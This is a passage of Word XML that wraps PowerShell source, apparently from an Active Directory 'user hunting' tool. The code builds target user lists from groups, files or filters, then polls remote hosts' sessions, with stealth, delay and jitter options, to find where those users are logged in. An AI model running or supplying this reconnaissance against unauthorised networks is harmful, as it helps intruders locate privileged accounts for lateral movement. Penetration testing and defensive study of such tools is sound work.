        <w:t xml:space="preserve">            $Threads = $ComputerName.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D077D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085190E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D1F1556" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C82699E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121AC976" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Now we build the user target set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF7F66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB72320" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB6FDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A8F918F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # users we're going to be searching for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CFE2BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetUsers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239FA3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="554131D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get the current user so we can ignore it in the results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412152AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentUser = ([Environment]::UserName).toLower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366DADAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="28ACEF90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're showing all results, skip username enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F2AC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ShowAll -or $ForeignUsers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7CD81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $User = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823D230" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $User | Add-Member Noteproperty 'MemberDomain' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31434CE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $User | Add-Member Noteproperty 'MemberName' '*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE964F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = @($User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD298DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="133F475B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ForeignUsers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA12547" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're searching for user results not in the primary domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A200FFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $krbtgtName = Convert-ADName -ObjectName "krbtgt@$($Domain)" -InputType Simple -OutputType NT4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11B4FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DomainShortName = $krbtgtName.split("\")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158956A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68DEFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FAE29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we want to hunt for the effective domain users who can access a target server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E092658" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($TargetServer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010FACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Querying target server '$TargetServer' for local users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667255A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4BBC15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B4D1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User | Add-Member Noteproperty 'MemberDomain' ($_.AccountName).split("/")[0].toLower() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A496C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User | Add-Member Noteproperty 'MemberName' ($_.AccountName).split("/")[1].toLower() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EF7FAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47025968" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402CB5C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46B30B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # if we get a specific username, only use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F6A5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($UserName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B04290" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Using target user '$UserName'..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F63A72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $User = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D00BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7881CD30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9A0AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485D899" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD357ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User | Add-Member Noteproperty 'MemberDomain' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE0D99E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100956EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $User | Add-Member Noteproperty 'MemberName' $UserName.ToLower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51584B03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = @($User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342A388" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E887265" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # read in a target user list if we have one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03996C4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($UserFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC971F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = Get-Content -Path $UserFile | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E4F3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20529BDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C328325" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DDE0B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302576B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE091A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $User | Add-Member Noteproperty 'MemberDomain' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11401E64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DAA5B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User | Add-Member Noteproperty 'MemberName' $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56133617" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0EF270" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A77839C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600D81C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($UserADSpath -or $UserFilter -or $AdminCount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F54E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F182A1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D143D01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Arguments = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C75181E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B1F0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852FBA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'ADSpath' = $UserADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C3B63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Filter' = $UserFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF0E04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'AdminCount' = $AdminCount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A59B37A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'AllowDelegation' = $AllowDelegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E472B42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5357F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3761B801" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCD714" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers += Get-NetUser @Arguments | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4533F681" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $User = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75847D57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $User | Add-Member Noteproperty 'MemberDomain' $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C96192" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $User | Add-Member Noteproperty 'MemberName' $_.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B11EB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3417E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56246CC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E6D8DEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA4DBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4E536" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA2023" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F982F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE2921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C99BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E32E85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C8128" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41739108" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if (( (-not $ShowAll) -and (-not $ForeignUsers) ) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098FADE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            throw "[!] No users found to search for!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F7A7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB0C1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="526C944B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81E055" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387E39C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, $Poll, $Delay, $Jitter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F33C37F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FDFA13A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # optionally check if the server is up first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6138E97D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F623BD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DD834" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C38D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389CF31C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782747B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Timer = [System.Diagnostics.Stopwatch]::StartNew()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F66AC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A47F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D572D4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44722F74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if(!$DomainShortName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B934370" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # if we're not searching for foreign users, check session information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F18C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Sessions = Get-NetSession -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB62BCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        ForEach ($Session in $Sessions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BA9F46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $UserName = $Session.sesi10_username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D37CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $CName = $Session.sesi10_cname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED227C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F4D16F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($CName -and $CName.StartsWith("\\")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7716EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $CName = $CName.TrimStart("\")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6DB4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0755EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1077B60C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # make sure we have a result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F9B23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if (($UserName) -and ($UserName.trim() -ne '') -and (!($UserName -match $CurrentUser))) {</w:t>
      </w:r>
    </w:p>
